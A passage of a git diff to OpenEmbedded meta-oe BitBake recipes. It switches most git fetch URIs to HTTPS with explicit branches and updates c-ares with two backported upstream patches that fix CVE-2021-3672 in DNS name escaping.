"2.5.0" -SRC_URI = "git://github.com/opendnssec/SoftHSMv2.git;branch=master" +SRC_URI = "git://github.com/opendnssec/SoftHSMv2.git;branch=master;protocol=https" SRCREV = "369df0383d101bc8952692c2a368ac8bc887d1b4" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/ace-cloud-editor/ace-cloud-editor_git.bb b/meta-openembedded/meta-oe/recipes-support/ace-cloud-editor/ace-cloud-editor_git.bb index 4ea6c8a295..8df94d91e2 100644 --- a/meta-openembedded/meta-oe/recipes-support/ace-cloud-editor/ace-cloud-editor_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/ace-cloud-editor/ace-cloud-editor_git.bb @@ -4,7 +4,7 @@ SUMMARY = "Ace is a code editor written in JavaScript. This repository has only LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=794d11c5219c59c9efa2487c2b4066b2" -SRC_URI = "git://github.com/ajaxorg/ace-builds.git;protocol=https" +SRC_URI = "git://github.com/ajaxorg/ace-builds.git;protocol=https;branch=master" PV = "02.07.17+git${SRCPV}" SRCREV = "812e2c56aed246931a667f16c28b096e34597016" diff --git a/meta-openembedded/meta-oe/recipes-support/avro/avro-c_1.9.2.bb b/meta-openembedded/meta-oe/recipes-support/avro/avro-c_1.9.2.bb index 0642179fb3..e85f341f1f 100644 --- a/meta-openembedded/meta-oe/recipes-support/avro/avro-c_1.9.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/avro/avro-c_1.9.2.bb @@ -9,7 +9,7 @@ DEPENDS = "jansson zlib xz" BRANCH = "branch-1.9" SRCREV = "bf20128ca6138a830b2ea13e0490f3df6b035639" -SRC_URI = "git://github.com/apache/avro;branch=${BRANCH} \ +SRC_URI = "git://github.com/apache/avro;branch=${BRANCH};protocol=https \ file://0001-cmake-Use-GNUInstallDirs-instead-of-hard-coded-paths.patch;patchdir=../../ \ " diff --git a/meta-openembedded/meta-oe/recipes-support/bdwgc/bdwgc_8.0.4.bb b/meta-openembedded/meta-oe/recipes-support/bdwgc/bdwgc_8.0.4.bb index 407de21385..d7d0b9c154 100644 --- a/meta-openembedded/meta-oe/recipes-support/bdwgc/bdwgc_8.0.4.bb +++ b/meta-openembedded/meta-oe/recipes-support/bdwgc/bdwgc_8.0.4.bb @@ -24,7 +24,7 @@ LIC_FILES_CHKSUM = "file://README.QUICK;md5=81b447d779e278628c843aef92f088fa" DEPENDS = "libatomic-ops" SRCREV = "d3dede3ce4462cd82a15f161af797ca51654546a" -SRC_URI = "git://github.com/ivmai/bdwgc.git;branch=release-8_0" +SRC_URI = "git://github.com/ivmai/bdwgc.git;branch=release-8_0;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-fix-formatting-and-handling-of-root.patch b/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-fix-formatting-and-handling-of-root.patch new file mode 100644 index 0000000000..d1cb54aefb --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-fix-formatting-and-handling-of-root.patch @@ -0,0 +1,115 @@ +From: bradh352 +Date: Fri, 11 Jun 2021 12:39:24 -0400 +Subject: [2/2] ares_expand_name(): fix formatting and handling of root name + response +Origin: https://github.com/c-ares/c-ares/commit/44c009b8e62ea1929de68e3f438181bea469ec14 +Bug-Debian-Security: https://security-tracker.debian.org/tracker/CVE-2021-3672 + +Fixes issue introduced in prior commit with formatting and handling +of parsing a root name response which should not be escaped. + +Fix By: Brad House +CVE: CVE-2021-3672 +Upstream-Status: Backport [http://snapshot.debian.org/archive/debian-security/20210810T064453Z/pool/updates/main/c/c-ares/c-ares_1.17.1-1%2Bdeb11u1.debian.tar.xz] +Signed-off-by: Neetika Singh +--- + ares_expand_name.c | 62 ++++++++++++++++++++++++-------------- + 1 file changed, 40 insertions(+), 22 deletions(-) + +diff --git a/ares_expand_name.c b/ares_expand_name.c +index f1c874a97cfc..eb9268c1ff0a 100644 +--- a/ares_expand_name.c ++++ b/ares_expand_name.c +@@ -127,27 +127,37 @@ int ares_expand_name(const unsigned char *encoded, const unsigned char *abuf, + } + else + { +- len = *p; ++ int name_len = *p; ++ len = name_len; + p++; ++ + while (len--) + { +- if (!isprint(*p)) { +- /* Output as \DDD for consistency with RFC1035 5.1 */ +- *q++ = '\\'; +- *q++ = '0' + *p / 100; +- *q++ = '0' + (*p % 100) / 10; +- *q++ = '0' + (*p % 10); +- } else if (is_reservedch(*p)) { +- *q++ = '\\'; +- *q++ = *p; +- } else { +- *q++ = *p; +- } ++ /* Output as \DDD for consistency with RFC1035 5.1, except ++ * for the special case of a root name response */ ++ if (!isprint(*p) && !(name_len == 1 && *p == 0)) ++ { ++ ++ *q++ = '\\'; ++ *q++ = '0' + *p / 100; ++ *q++ = '0' + (*p % 100) / 10; ++ *q++ = '0' + (*p % 10); ++ } ++ else if (is_reservedch(*p)) ++ { ++ *q++ = '\\'; ++ *q++ = *p; ++ } ++ else ++ { ++ *q++ = *p; ++ } + p++; + } + *q++ = '.'; + } +- } ++ } ++ + if (!indir) + *enclen = aresx_uztosl(p + 1U - encoded); + +@@ -194,21 +204,29 @@ static int name_length(const unsigned char *encoded, const unsigned char *abuf, + } + else if (top == 0x00) + { +- offset = *encoded; ++ int name_len = *encoded; ++ offset = name_len; + if (encoded + offset + 1 >= abuf + alen) + return -1; + encoded++; ++ + while (offset--) + { +- if (!isprint(*encoded)) { +- n += 4; +- } else if (is_reservedch(*encoded)) { +- n += 2; +- } else { +- n += 1; +- } ++ if (!isprint(*encoded) && !(name_len == 1 && *encoded == 0)) ++ { ++ n += 4; ++ } ++ else if (is_reservedch(*encoded)) ++ { ++ n += 2; ++ } ++ else ++ { ++ n += 1; ++ } + encoded++; + } ++ + n++; + } + else +-- +2.32.0 + diff --git a/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-should-escape-more-characters.patch b/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-should-escape-more-characters.patch new file mode 100644 index 0000000000..3603ef1278 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares/ares_expand_name-should-escape-more-characters.patch @@ -0,0 +1,90 @@ +From: bradh352 +Date: Fri, 11 Jun 2021 11:27:45 -0400 +Subject: [1/2] ares_expand_name() should escape more characters +Origin: https://github.com/c-ares/c-ares/commit/362f91d807d293791008cdb7616d40f7784ece83 +Bug-Debian-Security: https://security-tracker.debian.org/tracker/CVE-2021-3672 + +RFC1035 5.1 specifies some reserved characters and escaping sequences +that are allowed to be specified. Expand the list of reserved characters +and also escape non-printable characters using the \DDD format as +specified in the RFC. + +Bug Reported By: philipp.jeitner@sit.fraunhofer.de +Fix By: Brad House (@bradh352) +CVE: CVE-2021-3672 +Upstream-Status: Backport [http://snapshot.debian.org/archive/debian-security/20210810T064453Z/pool/updates/main/c/c-ares/c-ares_1.17.1-1%2Bdeb11u1.debian.tar.xz] +Signed-off-by: Neetika Singh +--- + ares_expand_name.c | 41 +++++++++++++++++++++++++++++++++++--- + 1 file changed, 38 insertions(+), 3 deletions(-) + +diff --git a/ares_expand_name.c b/ares_expand_name.c +index 407200ef5b4b..f1c874a97cfc 100644 +--- a/ares_expand_name.c ++++ b/ares_expand_name.c +@@ -32,6 +32,26 @@ + static int name_length(const unsigned char *encoded, const unsigned char *abuf, + int alen); + ++/* Reserved characters for names that need to be escaped */ ++static int is_reservedch(int ch) ++{ ++ switch (ch) { ++ case '"': ++ case '.': ++ case ';': ++ case '\\': ++ case '(': ++ case ')': ++ case '@': ++ case '$': ++ return 1; ++ default: ++ break; ++ } ++ ++ return 0; ++} ++ + /* Expand an RFC1035-encoded domain name given by encoded. The + * containing message is given by abuf and alen. The result given by + * *s, which is set to a NUL-terminated allocated buffer. *enclen is +@@ -111,9 +131,18 @@ int ares_expand_name(const unsigned char *encoded, const unsigned char *abuf, + p++; + while (len--) + { +- if (*p == '.' || *p == '\\') ++ if (!isprint(*p)) { ++ /* Output as \DDD for consistency with RFC1035 5.1 */ ++ *q++ = '\\'; ++ *q++ = '0' + *p / 100; ++ *q++ = '0' + (*p % 100) / 10; ++ *q++ = '0' + (*p % 10); ++ } else if (is_reservedch(*p)) { + *q++ = '\\'; +- *q++ = *p; ++ *q++ = *p; ++ } else { ++ *q++ = *p; ++ } + p++; + } + *q++ = '.'; +@@ -171,7 +200,13 @@ static int name_length(const unsigned char *encoded, const unsigned char *abuf, + encoded++; + while (offset--) + { +- n += (*encoded == '.' || *encoded == '\\') ? 2 : 1; ++ if (!isprint(*encoded)) { ++ n += 4; ++ } else if (is_reservedch(*encoded)) { ++ n += 2; ++ } else { ++ n += 1; ++ } + encoded++; + } + n++; +-- +2.32.0 + diff --git a/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.0.bb b/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.0.bb deleted file mode 100644 index e235b9b954..0000000000 --- a/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.0.bb +++ /dev/null @@ -1,27 +0,0 @@ -# Copyright (c) 2012-2014 LG Electronics, Inc. -SUMMARY = "c-ares is a C library that resolves names asynchronously." -HOMEPAGE = "http://daniel.haxx.se/projects/c-ares/" -SECTION = "libs" -LICENSE = "MIT" -LIC_FILES_CHKSUM = "file://LICENSE.md;md5=fb997454c8d62aa6a47f07a8cd48b006" - -PV = "1.16.0+gitr${SRCPV}" - -SRC_URI = "\ - git://github.com/c-ares/c-ares.git \ - file://cmake-install-libcares.pc.patch \ - file://0001-fix-configure-error-mv-libcares.pc.cmakein-to-libcar.patch \ -" -SRCREV = "077a587dccbe2f0d8a1987fbd3525333705c2249" - -UPSTREAM_CHECK_GITTAGREGEX = "cares-(?P\d+_(\d_?)+)" - -S = "${WORKDIR}/git" - -inherit cmake pkgconfig - -PACKAGES =+ "${PN}-utils" - -FILES_${PN}-utils = "${bindir}" - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.1.bb b/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.1.bb new file mode 100644 index 0000000000..b77604797d --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-support/c-ares/c-ares_1.16.1.bb @@ -0,0 +1,29 @@ +# Copyright (c) 2012-2014 LG Electronics, Inc. +SUMMARY = "c-ares is a C library that resolves names asynchronously." +HOMEPAGE = "http://daniel.haxx.se/projects/c-ares/" +SECTION = "libs" +LICENSE = "MIT" +LIC_FILES_CHKSUM = "file://LICENSE.md;md5=fb997454c8d62aa6a47f07a8cd48b006" + +PV = "1.16.0+gitr${SRCPV}" + +SRC_URI = "\ + git://github.com/c-ares/c-ares.git;branch=main;protocol=https \ + file://cmake-install-libcares.pc.patch \ + file://0001-fix-configure-error-mv-libcares.pc.cmakein-to-libcar.patch \ + file://ares_expand_name-should-escape-more-characters.patch \ + file://ares_expand_name-fix-formatting-and-handling-of-root.patch \ +" +SRCREV = "74a1426ba60e2cd7977e53a22ef839c87415066e" + +UPSTREAM_CHECK_GITTAGREGEX = "cares-(?P\d+_(\d_?)+)" + +S = "${WORKDIR}/git" + +inherit cmake pkgconfig + +PACKAGES =+ "${PN}-utils" + +FILES_${PN}-utils = "${bindir}" + +BBCLASSEXTEND = "native nativesdk" diff --git a/meta-openembedded/meta-oe/recipes-support/ceres-solver/ceres-solver_1.14.0.bb b/meta-openembedded/meta-oe/recipes-support/ceres-solver/ceres-solver_1.14.0.bb index 105610be5a..e0e50366d4 100644 --- a/meta-openembedded/meta-oe/recipes-support/ceres-solver/ceres-solver_1.14.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/ceres-solver/ceres-solver_1.14.0.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=35e00f0c4c96a0820a03e0b31e6416be" DEPENDS = "libeigen glog" -SRC_URI = "git://github.com/ceres-solver/ceres-solver.git" +SRC_URI = "git://github.com/ceres-solver/ceres-solver.git;branch=master;protocol=https" SRCREV = "facb199f3eda902360f9e1d5271372b7e54febe1" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/cli11/cli11_1.9.1.bb b/meta-openembedded/meta-oe/recipes-support/cli11/cli11_1.9.1.bb index 5f022d78af..64628255e2 100644 --- a/meta-openembedded/meta-oe/recipes-support/cli11/cli11_1.9.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/cli11/cli11_1.9.1.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=b73927b18d5c6cd8d2ed28a6ad539733" SRCREV = "5cb3efabce007c3a0230e4cc2e27da491c646b6c" PV .= "+git${SRCPV}" -SRC_URI += "gitsm://github.com/CLIUtils/CLI11;branch=v1" +SRC_URI += "gitsm://github.com/CLIUtils/CLI11;branch=v1;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/cmark/cmark_git.bb b/meta-openembedded/meta-oe/recipes-support/cmark/cmark_git.bb index f74a39b500..4f07beb317 100644 --- a/meta-openembedded/meta-oe/recipes-support/cmark/cmark_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/cmark/cmark_git.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/commonmark/cmark" LICENSE = "BSD-2-Clause & MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=81f9cae6293cc0345a9144b78152ab62" -SRC_URI = "git://github.com/commonmark/cmark.git" +SRC_URI = "git://github.com/commonmark/cmark.git;branch=master;protocol=https" SRCREV = "8daa6b1495124f0b67e6034130e12d7be83e38bd" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/daemonize/daemonize_git.bb b/meta-openembedded/meta-oe/recipes-support/daemonize/daemonize_git.bb index c76632781a..f46dec59fc 100644 --- a/meta-openembedded/meta-oe/recipes-support/daemonize/daemonize_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/daemonize/daemonize_git.bb @@ -7,7 +7,7 @@ PV = "1.7.8" inherit autotools SRCREV = "18869a797dab12bf1c917ba3b4782fef484c407c" -SRC_URI = "git://github.com/bmc/daemonize.git \ +SRC_URI = "git://github.com/bmc/daemonize.git;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/digitemp/digitemp_3.7.2.bb b/meta-openembedded/meta-oe/recipes-support/digitemp/digitemp_3.7.2.bb index 9fcc278d35..cac2b4fd61 100644 --- a/meta-openembedded/meta-oe/recipes-support/digitemp/digitemp_3.7.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/digitemp/digitemp_3.7.2.bb @@ -4,7 +4,7 @@ DEPENDS = "libusb1" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=44fee82a1d2ed0676cf35478283e0aa0" -SRC_URI = "git://github.com/bcl/digitemp" +SRC_URI = "git://github.com/bcl/digitemp;branch=master;protocol=https" SRCREV = "a162e63aad35358aab325388f3d5e88121606419" diff --git a/meta-openembedded/meta-oe/recipes-support/dstat/dstat_0.7.4.bb b/meta-openembedded/meta-oe/recipes-support/dstat/dstat_0.7.4.bb index 74af54ca53..18c3cdf82c 100644 --- a/meta-openembedded/meta-oe/recipes-support/dstat/dstat_0.7.4.bb +++ b/meta-openembedded/meta-oe/recipes-support/dstat/dstat_0.7.4.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" DEPENDS += "asciidoc-native xmlto-native" -SRC_URI = "git://github.com/dagwieers/dstat.git \ +SRC_URI = "git://github.com/dagwieers/dstat.git;branch=master;protocol=https \ file://0001-change-dstat-to-python3.patch \ " @@ -21,4 +21,4 @@ do_install() { oe_runmake 'DESTDIR=${D}' install } -RDEPENDS_${PN} += "python3-core python3-misc python3-resource python3-shell python3-unixadmin" +RDEPENDS_${PN} += "python3-core python3-misc python3-resource python3-shell python3-six python3-unixadmin" diff --git a/meta-openembedded/meta-oe/recipes-support/epeg/epeg_git.bb b/meta-openembedded/meta-oe/recipes-support/epeg/epeg_git.bb index 8ca574014b..bdffe4ba78 100644 --- a/meta-openembedded/meta-oe/recipes-support/epeg/epeg_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/epeg/epeg_git.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=e7732a9290ea1e4b034fdc15cf49968d \ file://COPYING-PLAIN;md5=f59cacc08235a546b0c34a5422133035" DEPENDS = "jpeg libexif" -SRC_URI = "git://github.com/mattes/epeg.git" +SRC_URI = "git://github.com/mattes/epeg.git;branch=master;protocol=https" SRCREV = "9a175cd67eaa61fe45413d8da82da72936567047" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/fmt/fmt_6.2.0.bb b/meta-openembedded/meta-oe/recipes-support/fmt/fmt_6.2.0.bb index 05dc94a990..1a05f0d547 100644 --- a/meta-openembedded/meta-oe/recipes-support/fmt/fmt_6.2.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/fmt/fmt_6.2.0.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://fmt.dev" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=af88d758f75f3c5c48a967501f24384b" -SRC_URI += "git://github.com/fmtlib/fmt" +SRC_URI += "git://github.com/fmtlib/fmt;branch=master;protocol=https" SRCREV = "9bdd1596cef1b57b9556f8bef32dc4a32322ef3e" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/freerdp/freerdp_git.bb b/meta-openembedded/meta-oe/recipes-support/freerdp/freerdp_git.bb index 82ef561fbe..309acfbffc 100644 --- a/meta-openembedded/meta-oe/recipes-support/freerdp/freerdp_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/freerdp/freerdp_git.bb @@ -16,7 +16,7 @@ PKGV = "${GITPKGVTAG}" # 2.0.0 release SRCREV = "5ab2bed8749747b8e4b2ed431fd102bc726be684" -SRC_URI = "git://github.com/FreeRDP/FreeRDP.git \ +SRC_URI = "git://github.com/FreeRDP/FreeRDP.git;branch=master;protocol=https \ file://winpr-makecert-Build-with-install-RPATH.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/function2/function2_4.0.0.bb b/meta-openembedded/meta-oe/recipes-support/function2/function2_4.0.0.bb index 556a25aa14..07aa669375 100644 --- a/meta-openembedded/meta-oe/recipes-support/function2/function2_4.0.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/function2/function2_4.0.0.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=e4224ccaecb14d942c71d31bef20d78c" SRCREV = "d2acdb6c3c7612a6133cd03464ef941161258f4e" PV .= "+git${SRCPV}" -SRC_URI += "gitsm://github.com/Naios/function2" +SRC_URI += "gitsm://github.com/Naios/function2;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/gd/gd_2.3.0.bb b/meta-openembedded/meta-oe/recipes-support/gd/gd_2.3.0.bb index eec8a05ae8..8adb7db4d1 100644 --- a/meta-openembedded/meta-oe/recipes-support/gd/gd_2.3.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/gd/gd_2.3.0.bb @@ -13,7 +13,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=8e5bc8627b9494741c905d65238c66b7" DEPENDS = "freetype libpng jpeg zlib tiff" -SRC_URI = "git://github.com/libgd/libgd.git;branch=master \ +SRC_URI = "git://github.com/libgd/libgd.git;branch=master;protocol=https \ " SRCREV = "b079fa06223c3ab862c8f0eea58a968727971988" diff --git a/meta-openembedded/meta-oe/recipes-support/gflags/gflags_2.2.2.bb b/meta-openembedded/meta-oe/recipes-support/gflags/gflags_2.2.2.bb index 6eea0c00ec..4379c2d9e1 100644 --- a/meta-openembedded/meta-oe/recipes-support/gflags/gflags_2.2.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/gflags/gflags_2.2.2.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/gflags/gflags" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING.txt;md5=c80d1a3b623f72bb85a4c75b556551df" -SRC_URI = "git://github.com/gflags/gflags.git" +SRC_URI = "git://github.com/gflags/gflags.git;branch=master;protocol=https" SRCREV = "e171aa2d15ed9eb17054558e0b3a6a413bb01067" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/glog/glog_0.3.5.bb b/meta-openembedded/meta-oe/recipes-support/glog/glog_0.3.5.bb index 56bf515544..55ca838cd7 100644 --- a/meta-openembedded/meta-oe/recipes-support/glog/glog_0.3.5.bb +++ b/meta-openembedded/meta-oe/recipes-support/glog/glog_0.3.5.bb @@ -7,7 +7,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=dc9db360e0bbd4e46672f3fd91dd6c4b" SRC_URI = " \ - git://github.com/google/glog.git;nobranch=1 \ + git://github.com/google/glog.git;nobranch=1;protocol=https \ file://0001-Rework-CMake-glog-VERSION-management.patch \ file://0002-Find-Libunwind-during-configure.patch \ file://0003-installation-path-fix.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb b/meta-openembedded/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb index 146747eee1..ac46b5676c 100644 --- a/meta-openembedded/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb +++ b/meta-openembedded/meta-oe/recipes-support/gnulib/gnulib_2018-03-07.03.bb @@ -13,7 +13,7 @@ LICENSE = "LGPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=56a22a6e5bcce45e2c8ac184f81412b5" SRCREV = "0d6e3307bbdb8df4d56043d5f373eeeffe4cbef3" -SRC_URI = "git://git.sv.gnu.org/gnulib.git \ +SRC_URI = "git://git.sv.gnu.org/gnulib.git;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/gperftools/gperftools_2.7.90.bb b/meta-openembedded/meta-oe/recipes-support/gperftools/gperftools_2.7.90.bb index b7b7839313..1a1f7db5cf 100644 --- a/meta-openembedded/meta-oe/recipes-support/gperftools/gperftools_2.7.90.bb +++ b/meta-openembedded/meta-oe/recipes-support/gperftools/gperftools_2.7.90.bb @@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=762732742c73dc6c7fbe8632f06c059a" SRCREV = "db7aa547abb5abdd558587a15502584cbc825438" -SRC_URI = "git://github.com/gperftools/gperftools \ +SRC_URI = "git://github.com/gperftools/gperftools;branch=master;protocol=https \ file://0001-Support-Atomic-ops-on-clang.patch \ file://0001-fix-build-with-musl-libc.patch \ file://0001-disbale-heap-checkers-and-debug-allocator-on-musl.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/gpm/gpm_git.bb b/meta-openembedded/meta-oe/recipes-support/gpm/gpm_git.bb index 3800d147f9..6bf071d89e 100644 --- a/meta-openembedded/meta-oe/recipes-support/gpm/gpm_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/gpm/gpm_git.bb @@ -13,7 +13,7 @@ SRCREV = "1fd19417b8a4dd9945347e98dfa97e4cfd798d77" DEPENDS = "ncurses bison-native" -SRC_URI = "git://github.com/telmich/gpm;protocol=git \ +SRC_URI = "git://github.com/telmich/gpm;protocol=https;branch=master \ file://init \ file://gpm.service.in \ file://0001-Use-sigemptyset-API-instead-of-__sigemptyset.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/hidapi/hidapi_git.bb b/meta-openembedded/meta-oe/recipes-support/hidapi/hidapi_git.bb index a34797ff51..1cc3acac2c 100644 --- a/meta-openembedded/meta-oe/recipes-support/hidapi/hidapi_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/hidapi/hidapi_git.bb @@ -8,7 +8,7 @@ DEPENDS = "libusb udev" PV = "0.7.99+0.8.0-rc1+git${SRCPV}" SRCREV = "d17db57b9d4354752e0af42f5f33007a42ef2906" -SRC_URI = "git://github.com/signal11/hidapi.git" +SRC_URI = "git://github.com/signal11/hidapi.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell-dictionaries.bb b/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell-dictionaries.bb index 3da67d1e3a..2e902ca4cb 100644 --- a/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell-dictionaries.bb +++ b/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell-dictionaries.bb @@ -135,7 +135,7 @@ RDEPENDS_${PN} = "hunspell" PV = "0.0.0+git${SRCPV}" SRCREV = "820a65e539e34a3a8c2a855d2450b84745c624ee" -SRC_URI = "git://github.com/wooorm/dictionaries.git" +SRC_URI = "git://github.com/wooorm/dictionaries.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell_1.7.0.bb b/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell_1.7.0.bb index c2fb4fa05b..63d68ea06b 100644 --- a/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell_1.7.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/hunspell/hunspell_1.7.0.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = " \ " SRCREV = "4ddd8ed5ca6484b930b111aec50c2750a6119a0f" -SRC_URI = "git://github.com/${BPN}/${BPN}.git" +SRC_URI = "git://github.com/${BPN}/${BPN}.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_git.bb b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_git.bb index 5f3e3f686a..1d0c640003 100644 --- a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=1556547711e8246992b999edd9445a57" PV = "0.333" SRCREV = "2de52be0d00015fa6cde70bb845fa9b86cf6f420" -SRC_URI = "git://github.com/vcrhonek/${BPN}.git" +SRC_URI = "git://github.com/vcrhonek/${BPN}.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/iksemel/iksemel_1.5.bb b/meta-openembedded/meta-oe/recipes-support/iksemel/iksemel_1.5.bb index 986984d1ff..ac23630d01 100644 --- a/meta-openembedded/meta-oe/recipes-support/iksemel/iksemel_1.5.bb +++ b/meta-openembedded/meta-oe/recipes-support/iksemel/iksemel_1.5.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" SRCREV = "978b733462e41efd5db72bc9974cb3b0d1d5f6fa" PV = "1.5+git${SRCPV}" -SRC_URI = "git://github.com/meduketto/iksemel.git;protocol=https \ +SRC_URI = "git://github.com/meduketto/iksemel.git;protocol=https;branch=master \ file://fix-configure-option-parsing.patch \ file://avoid-obsolete-gnutls-apis.patch" diff --git a/meta-openembedded/meta-oe/recipes-support/imagemagick/imagemagick_7.0.9.bb b/meta-openembedded/meta-oe/recipes-support/imagemagick/imagemagick_7.0.9.bb index 3f7d06e261..26a5d4a4d2 100644 --- a/meta-openembedded/meta-oe/recipes-support/imagemagick/imagemagick_7.0.9.bb +++ b/meta-openembedded/meta-oe/recipes-support/imagemagick/imagemagick_7.0.9.bb @@ -10,7 +10,7 @@ DEPENDS = "lcms bzip2 jpeg libpng tiff zlib fftw freetype libtool" BASE_PV := "${PV}" PV .= "_13" -SRC_URI = "git://github.com/ImageMagick/ImageMagick.git " +SRC_URI = "git://github.com/ImageMagick/ImageMagick.git;branch=master;protocol=https" SRCREV = "15b935d64f613b5a0fc9d3fead5c6ec1b0e3908f" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/inih/libinih_git.bb b/meta-openembedded/meta-oe/recipes-support/inih/libinih_git.bb index 227e2a7b7c..4c3c8f0fa7 100644 --- a/meta-openembedded/meta-oe/recipes-support/inih/libinih_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/inih/libinih_git.bb @@ -9,7 +9,7 @@ PR = "r3" # The github repository provides a cmake and pkg-config integration SRCREV = "c858aff8c31fa63ef4d1e0176c10e5928cde9a23" -SRC_URI = "git://github.com/OSSystems/inih.git \ +SRC_URI = "git://github.com/OSSystems/inih.git;branch=master;protocol=https \ " UPSTREAM_CHECK_COMMITS = "1" diff --git a/meta-openembedded/meta-oe/recipes-support/iniparser/iniparser_4.1.bb b/meta-openembedded/meta-oe/recipes-support/iniparser/iniparser_4.1.bb index f4b553a578..f3593fb5ff 100644 --- a/meta-openembedded/meta-oe/recipes-support/iniparser/iniparser_4.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/iniparser/iniparser_4.1.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=e02baf71c76e0650e667d7da133379ac" DEPENDS = "doxygen-native" -SRC_URI = "git://github.com/ndevilla/iniparser.git;protocol=https \ +SRC_URI = "git://github.com/ndevilla/iniparser.git;protocol=https;branch=master \ file://Add-CMake-support.patch" # tag 4.1 diff --git a/meta-openembedded/meta-oe/recipes-support/inotify-tools/inotify-tools_git.bb b/meta-openembedded/meta-oe/recipes-support/inotify-tools/inotify-tools_git.bb index f42abeb2ba..1d84bfd498 100644 --- a/meta-openembedded/meta-oe/recipes-support/inotify-tools/inotify-tools_git.bb +++ 